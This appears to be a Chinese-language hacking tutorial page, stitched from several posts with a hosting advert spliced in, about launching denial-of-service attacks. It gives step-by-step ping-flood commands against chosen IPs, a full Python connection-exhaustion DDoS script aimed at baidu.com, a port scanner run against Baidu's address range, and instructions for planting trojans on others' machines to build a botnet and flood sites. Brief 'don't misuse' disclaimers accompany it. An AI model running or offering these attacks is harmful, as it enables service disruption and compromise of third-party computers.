1、首先在[開始]按鈕右擊點擊其中的【運行】或者“win+R”打開運行框
讓客戶滿意是我們工作的目標(biāo),不斷超越客戶的期望值來自于我們對這個行業(yè)的熱愛。我們立志把好的技術(shù)通過有效、簡單的方式提供給客戶,將通過不懈努力成為客戶在信息化領(lǐng)域值得信任、有價值的長期合作伙伴,公司提供的服務(wù)項目有:域名與空間、網(wǎng)絡(luò)空間、營銷軟件、網(wǎng)站建設(shè)、泗陽網(wǎng)站維護(hù)、網(wǎng)站推廣。
2、接著,在運行框里面輸入“cmd”然后點擊確定
3、在“命令提示符”中,輸入“arp -a",回車。并選擇你想要攻擊的ip"arp-a"這一步是看當(dāng)前局域網(wǎng)里面的設(shè)備連接狀態(tài)
4、輸入”ping -l 65500 192.168.1.103 -t“并回車;-l是發(fā)送緩沖區(qū)大小,65500是它的極限;-t 就是一直無限下去,直到停止假設(shè)我要攻擊ip為192.168.1.103的服務(wù)器,這就是ddos攻擊
5、如果要停止攻擊,就要按鍵盤上”Ctrl+C“來結(jié)束
DDOS名詞解釋,分布式拒絕服務(wù)(DDoS:Distributed Denial of Service)攻擊指借助于客戶/服務(wù)器技術(shù),將多個計算機聯(lián)合起來作為攻擊平臺,對一個或多個目標(biāo)發(fā)動DDoS攻擊,從而成倍地提高拒絕服務(wù)攻擊的威力。
一流的攻擊速度以及強大的隱蔽性能,使得DDOS集合了市面上所有攻擊軟件優(yōu)點成為了最熱的攻擊方式。接下來本文將簡單的介紹一下三種最為流行的DDOS攻擊方式
給你個最簡單的,讓對方內(nèi)存供不應(yīng)求,使其癱瘓。代碼如下:
ping -l 65500 目標(biāo)ip -t
這么簡單?被嚇著了吧?這叫“死亡之ping",人家電腦按了補丁就不行了。至于其他復(fù)雜的,你還是別多問了,不作死就不會死,具體請看我(被朋友報復(fù)整死了)
DDOS攻擊是現(xiàn)在最常見的一種黑客攻擊方式,下面就給大家簡單介紹一下DDOS的七種攻擊方式。
1.Synflood: 該攻擊以多個隨機的源主機地址向目的主機發(fā)送SYN包,而在收到目的主機的SYN ACK后并不回應(yīng),這樣,目的主機就為這些源主機建立了大量的連接隊列,而且由于沒有收到ACK一直維護(hù)著這些隊列,造成了資源的大量消耗而不能向正常請求提供服務(wù)。
2.Smurf:該攻擊向一個子網(wǎng)的廣播地址發(fā)一個帶有特定請求(如ICMP回應(yīng)請求)的包,并且將源地址偽裝成想要攻擊的主機地址。子網(wǎng)上所有主機都回應(yīng)廣播包請求而向被攻擊主機發(fā)包,使該主機受到攻擊。
3.Land-based:攻擊者將一個包的源地址和目的地址都設(shè)置為目標(biāo)主機的地址,然后將該包通過IP欺騙的方式發(fā)送給被攻擊主機,這種包可以造成被攻擊主機因試圖與自己建立連接而陷入死循環(huán),從而很大程度地降低了系統(tǒng)性能。
4.Ping of Death:根據(jù)TCP/IP的規(guī)范,一個包的長度最大為65536字節(jié)。盡管一個包的長度不能超過65536字節(jié),但是一個包分成的多個片段的疊加卻能做到。當(dāng)一個主機收到了長度大于65536字節(jié)的包時,就是受到了Ping of Death攻擊,該攻擊會造成主機的宕機。
5.Teardrop:IP數(shù)據(jù)包在網(wǎng)絡(luò)傳遞時,數(shù)據(jù)包可以分成更小的片段。攻擊者可以通過發(fā)送兩段(或者更多)數(shù)據(jù)包來實現(xiàn)TearDrop攻擊。第一個包的偏移量為0,長度為N,第二個包的偏移量小于N。為了合并這些數(shù)據(jù)段,TCP/IP堆棧會分配超乎尋常的巨大資源,從而造成系統(tǒng)資源的缺乏甚至機器的重新啟動。
6.PingSweep:使用ICMP Echo輪詢多個主機。
7.Pingflood: 該攻擊在短時間內(nèi)向目的主機發(fā)送大量ping包,造成網(wǎng)絡(luò)堵塞或主機資源耗盡
隨著Internet互聯(lián)網(wǎng)絡(luò)帶寬的增加和多種DDoS黑客工具的不斷發(fā)布,DDoS拒絕服務(wù)攻擊的實施越來越容易,DDoS攻擊事件正在成上升趨勢。出于商業(yè)競爭、打擊報復(fù)和網(wǎng)絡(luò)敲詐等多種因素,導(dǎo)致很多IDC托管機房、商業(yè)站點、游戲服務(wù)器、聊天網(wǎng)絡(luò)等網(wǎng)絡(luò)服務(wù)商長期以來一直被DDoS攻擊所困擾,隨之而來的是客戶投訴、同虛擬主機用戶受牽連、法律糾紛、商業(yè)損失等一系列問題,因此,解決DDoS攻擊問題成為網(wǎng)絡(luò)服務(wù)商必須考慮的頭等大事。
DDoS是英文Distributed Denial of Service的縮寫,意即分布式拒絕服務(wù),那么什么又是拒絕服務(wù)(Denial of Service)呢?可以這么理解,凡是能導(dǎo)致合法用戶不能夠訪問正常網(wǎng)絡(luò)服務(wù)的行為都算是拒絕服務(wù)攻擊。也就是說拒絕服務(wù)攻擊的目的非常明確,就是要阻止合法用戶對正常網(wǎng)絡(luò)資源的訪問,從而達(dá)成攻擊者不可告人的目的。
雖然同樣是拒絕服務(wù)攻擊,但是DDoS和DOS還是有所不同,DDoS的攻擊策略側(cè)重于通過很多僵尸主機(被攻擊者入侵過或可間接利用的主機) 向受害主機發(fā)送大量看似合法的網(wǎng)絡(luò)包,從而造成網(wǎng)絡(luò)阻塞或服務(wù)器資源耗盡而導(dǎo)致拒絕服務(wù),分布式拒絕服務(wù)攻擊一旦被實施,攻擊網(wǎng)絡(luò)包就會猶如洪水般涌向受害主機,從而把合法用戶的網(wǎng)絡(luò)包淹沒,導(dǎo)致合法用戶無法正常訪問服務(wù)器的網(wǎng)絡(luò)資源,因此,拒絕服務(wù)攻擊又被稱之為洪水式攻擊。
常見的DDoS攻擊手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script Flood、Proxy Flood等;而DOS則側(cè)重于通過對主機特定漏洞的利用攻擊導(dǎo)致網(wǎng)絡(luò)棧失效、系統(tǒng)崩潰、主機死機而無法提供正常的網(wǎng)絡(luò)服務(wù)功能,從而造成拒絕服務(wù),常見的DOS攻擊手段有TearDrop、Land、Jolt、IGMP Nuker、Boink、Smurf、Bonk、OOB等。就這兩種拒絕服務(wù)攻擊而言,危害較大的主要是DDoS攻擊,原因是很難防范,至于DOS攻擊,通過給主機服務(wù)器打補丁或安裝防火墻軟件就可以很好地防范,后文會詳細(xì)介紹怎么對付DDoS攻擊。三、被DDoS了嗎?
DDoS的表現(xiàn)形式主要有兩種,一種為流量攻擊,主要是針對網(wǎng)絡(luò)帶寬的攻擊,即大量攻擊包導(dǎo)致網(wǎng)絡(luò)帶寬被阻塞,合法網(wǎng)絡(luò)包被虛假的攻擊包淹沒而無法到達(dá)主機;另一種為資源耗盡攻擊,主要是針對服務(wù)器主機的攻擊,即通過大量攻擊包導(dǎo)致主機的內(nèi)存被耗盡或CPU被內(nèi)核及應(yīng)用程序占完而造成無法提供網(wǎng)絡(luò)服務(wù)。
當(dāng)然,這樣測試的前提是你到服務(wù)器主機之間的ICMP協(xié)議沒有被路由器和防火墻等設(shè)備屏蔽,否則可采取Telnet主機服務(wù)器的網(wǎng)絡(luò)服務(wù)端口來測試,效果是一樣的。不過有一點可以肯定,假如平時Ping你的主機服務(wù)器和接在同一交換機上的主機服務(wù)器都是正常的,突然都Ping不通了或者是嚴(yán)重丟包,那么假如可以排除網(wǎng)絡(luò)故障因素的話則肯定是遭受了流量攻擊,再一個流量攻擊的典型現(xiàn)象是,一旦遭受流量攻擊,會發(fā)現(xiàn)用遠(yuǎn)程終端連接網(wǎng)站服務(wù)器會失敗。
相對于流量攻擊而言,資源耗盡攻擊要容易判斷一些,假如平時Ping網(wǎng)站主機和訪問網(wǎng)站都是正常的,發(fā)現(xiàn)突然網(wǎng)站訪問非常緩慢或無法訪問了,而 Ping還可以Ping通,則很可能遭受了資源耗盡攻擊,此時若在服務(wù)器上用Netstat -na命令觀察到有大量的SYN_RECEIVED、TIME_WAIT、FIN_WAIT_1等狀態(tài)存在,而ESTABLISHED很少,則可判定肯定是遭受了資源耗盡攻擊。
還有一種屬于資源耗盡攻擊的現(xiàn)象是,Ping自己的網(wǎng)站主機Ping不通或者是丟包嚴(yán)重,而Ping與自己的主機在同一交換機上的服務(wù)器則正常,造成這種原因是網(wǎng)站主機遭受攻擊后導(dǎo)致系統(tǒng)內(nèi)核或某些應(yīng)用程序CPU利用率達(dá)到100%無法回應(yīng)Ping命令,其實帶寬還是有的,否則就Ping不通接在同一交換機上的主機了。
當(dāng)前主要有三種流行的DDoS攻擊:
1、SYN/ACK Flood攻擊:這種攻擊方法是經(jīng)典最有效的DDoS方法,可通殺各種系統(tǒng)的網(wǎng)絡(luò)服務(wù),主要是通過向受害主機發(fā)送大量偽造源IP和源端口的SYN或ACK 包,導(dǎo)致主機的緩存資源被耗盡或忙于發(fā)送回應(yīng)包而造成拒絕服務(wù),由于源都是偽造的故追蹤起來比較困難,缺點是實施起來有一定難度,需要高帶寬的僵尸主機支持。
少量的這種攻擊會導(dǎo)致主機服務(wù)器無法訪問,但卻可以Ping的通,在服務(wù)器上用Netstat -na命令會觀察到存在大量的SYN_RECEIVED狀態(tài),大量的這種攻擊會導(dǎo)致Ping失敗、TCP/IP棧失效,并會出現(xiàn)系統(tǒng)凝固現(xiàn)象,即不響應(yīng)鍵盤和鼠標(biāo)。普通防火墻大多無法抵御此種攻擊。
2、TCP全連接攻擊:這種攻擊是為了繞過常規(guī)防火墻的檢查而設(shè)計的,一般情況下,常規(guī)防火墻大多具備過濾TearDrop、Land等DOS攻擊的能力,但對于正常的TCP連接是放過的,殊不知很多網(wǎng)絡(luò)服務(wù)程序(如:IIS、Apache等Web服務(wù)器)能接受的TCP連接數(shù)是有限的。
一旦有大量的TCP連接,即便是正常的,也會導(dǎo)致網(wǎng)站訪問非常緩慢甚至無法訪問,TCP全連接攻擊就是通過許多僵尸主機不斷地與受害服務(wù)器建立大量的TCP連接,直到服務(wù)器的內(nèi)存等資源被耗盡而被拖跨,從而造成拒絕服務(wù),這種攻擊的特點是可繞過一般防火墻的防護(hù)而達(dá)到攻擊目的,缺點是需要找很多僵尸主機,并且由于僵尸主機的IP是暴露的,因此容易被追蹤。
3、刷Script腳本攻擊:這種攻擊主要是針對存在ASP、JSP、PHP、CGI等腳本程序,并調(diào)用MSSQLServer、 MySQLServer、Oracle等數(shù)據(jù)庫的網(wǎng)站系統(tǒng)而設(shè)計的,特征是和服務(wù)器建立正常的TCP連接,并不斷的向腳本程序提交查詢、列表等大量耗費數(shù)據(jù)庫資源的調(diào)用,典型的以小博大的攻擊方法。
一般來說,提交一個GET或POST指令對客戶端的耗費和帶寬的占用是幾乎可以忽略的,而服務(wù)器為處理此請求卻可能要從上萬條記錄中去查出某個記錄,這種處理過程對資源的耗費是很大的,常見的數(shù)據(jù)庫服務(wù)器很少能支持?jǐn)?shù)百個查詢指令同時執(zhí)行,而這對于客戶端來說卻是輕而易舉的,因此攻擊者只需通過 Proxy代理向主機服務(wù)器大量遞交查詢指令,只需數(shù)分鐘就會把服務(wù)器資源消耗掉而導(dǎo)致拒絕服務(wù)。
常見的現(xiàn)象就是網(wǎng)站慢如蝸牛、ASP程序失效、PHP連接數(shù)據(jù)庫失敗、數(shù)據(jù)庫主程序占用CPU偏高。這種攻擊的特點是可以完全繞過普通的防火墻防護(hù),輕松找一些Proxy代理就可實施攻擊,缺點是對付只有靜態(tài)頁面的網(wǎng)站效果會大打折扣,并且有些Proxy會暴露攻擊者的IP地址。
會Python嗎?下一個Python3.7.0-3.7.3,把代碼復(fù)制下,粘貼即可
代碼:
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="baidu.com"#在雙引號里輸入對方IP或域名,要保證他聯(lián)網(wǎng)了或開機了,這里拿百度做示范(別運行!不然后果自負(fù)?。。?/p>
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
? s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
? try:
? ? ? s.connect((HOST,PORT))
? ? ? s.send(buf.encode())
? ? ? print ("Send buf OK!,conn=%d\n"%i)
? ? ? socks.append(s)
? except Exception as ex:
? ? ? print ("Could not connect to server or send error:%s"%ex)
? ? ? time.sleep(10)
#end def
def send_thread():
global socks
while True:
? for s in socks:
? ? ? try:
? ? ? ? ? s.send("f".encode())
? ? ? ? ? #print "send OK!"
? ? ? except Exception as ex:
? ? ? ? ? print ("Send Exception:%s\n"%ex)
? ? ? ? ? socks.remove(s)
? ? ? ? ? s.close()
? time.sleep(1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
如果你要攻擊網(wǎng)站,以上代碼雖然可行,但是,攻擊效果很不好。
所以,最好用Windows里的PING進(jìn)行檢測
操作:
在Windows搜索欄里輸入:cmd
輸入:
ping -n 10 -l 1 baidu.com
//這里拿百度做示范,別真打百度!
那么,就會發(fā)現(xiàn),系統(tǒng)反映了:
正在 Ping baidu.com [39.156.69.79] 具有 1 字節(jié)的數(shù)據(jù):
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=26ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=29ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=26ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
來自 39.156.69.79 的回復(fù): 字節(jié)=1 時間=27ms TTL=52
39.156.69.79 的 Ping 統(tǒng)計信息:
數(shù)據(jù)包: 已發(fā)送 = 10,已接收 = 10,丟失 = 0 (0% 丟失),
往返行程的估計時間(以毫秒為單位):
最短 = 26ms,最長 = 29ms,平均 = 27ms
說明,百度的服務(wù)器有一個主服務(wù)器是39.156.69.79
那么,就來查找百度的所有服務(wù)器吧!
輸入以下代碼:
#絕大多數(shù)成功的網(wǎng)絡(luò)攻擊都是以端口掃描開始的,在網(wǎng)絡(luò)安全和黑客領(lǐng)域,端口掃描是經(jīng)常用到的技術(shù),可以探測指定主機上是否
#開放了指定端口,進(jìn)一步判斷主機是否運行了某些重要的網(wǎng)絡(luò)服務(wù),最終判斷是否存在潛在的安全漏洞,從一定意義上將也屬于系統(tǒng)運維的范疇
#端口掃描器程序:模擬端口掃描器的工作原理,并采用多進(jìn)程技術(shù)提高掃描速度
import socket
import sys
import multiprocessing
import time as t
def ports(ports_serve):
#獲取常用端口對應(yīng)的服務(wù)名稱
for port in list(range(1,100))+[143,145,113,443,445,3389,8080]:
? try:
? ? ? ports_serve[port]=socket.getservbyport(port)
? except socket.error:
? ? ? pass
def ports_scan(host,ports_service):
ports_open=[]
try:
? sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
? #超時時間的不同會影響掃描結(jié)果的精確度
? socket.timeout(0.01)
except socket.error:
? print('socket creation error')
? sys.exit()
for port in ports_service:
? try:
? ? ? #嘗試連接指定端口
? ? ? sock.connect((host,port))
? ? ? #記錄打開的端口
? ? ? ports_open.append(port)
? ? ? sock.close()
? except socket.error:
? ? ? pass
return ports_open
if __name__ == '__main__':
m=multiprocessing.Manager()
ports_service=dict()
results=dict()
ports(ports_service)
#創(chuàng)建進(jìn)程池,允許最多8個進(jìn)程同時運行
pool = multiprocessing.Pool(processes=8)
net = '39.156.69.'#后面的IP少一個,因為要掃描這段區(qū)域內(nèi)的IP,從而進(jìn)行攻擊
for host_number in map(str,range(8,10)):
? host = net + host_number
? #創(chuàng)建一個新進(jìn)程,同時記錄其運行結(jié)果
? results[host] = pool.apply_async(ports_scan,(host,ports_service))
? print('starting '+host+'...')
#關(guān)閉進(jìn)程池,close()必須在join()之前調(diào)用
pool.close()
#等待進(jìn)程池中的進(jìn)程全部執(zhí)行結(jié)束
pool.join()
#打印輸出結(jié)果
for host in results:
? print('='*30)
? print(host,'.'*10)
? for port in results[host].get():
? ? ? print(port,':',ports_service[port])
? ?
你會發(fā)現(xiàn),Python反映了:
starting 39.156.69.8...
starting 39.156.69.9...
//并不是指百度只有這兩個服務(wù)器!而是我們目前只能掃描到兩個!
接著,運行DDoS攻擊程序,把IP分別改為39.156.69.8和39.156.69.9
就可以實現(xiàn)DDoS攻擊了。
//注:請不要用于違法用途,并且不要隨意進(jìn)行攻擊。如想使用,可攻擊虛擬機,但不要攻擊外網(wǎng)IP和域名!??!
第一步:下載一個DDOS攻擊的軟件,phpddos.或者終結(jié)者遠(yuǎn)控?;蛘叻?wù)器的發(fā)包工具,比如QQ蝸牛
第二步:如果是phpddos,下載一些PHP的資源,一般都是6.0的小馬通用的,載入到攻擊器,phpddos打的都是UDPFLOOD流量,填寫IP,通用攻擊端口為80,檢測對方網(wǎng)絡(luò)情況,在DOS窗口輸入 ping ip -t ,如果對方?jīng)]有采取禁止外網(wǎng)ping功能,那么就會有數(shù)據(jù)回復(fù),如果攻擊掉線,數(shù)據(jù)回復(fù)就中斷,出現(xiàn)request timed out. 如果是采取自帶壓力的DDOS攻擊遠(yuǎn)控之類,首先要用遠(yuǎn)控配置木馬程序,然后要把木馬程序批量種植到他人的電腦上,比如1433抓雞,135抓雞,如果木馬不免殺,就掃下國外的,工具網(wǎng)上都有。抓到足夠的肉雞,打開壓力測試,輸入IP,攻擊模式有很多種,CC攻擊是用肉雞來C網(wǎng)頁的,也就是站點根服務(wù)器,或者空間不會有流量異常,但網(wǎng)頁會打不開,也可以對站點IP進(jìn)行SYNFLOOD UDPFLOOD之類的攻擊,打網(wǎng)站比較有效的是現(xiàn)在最新的DNS模式。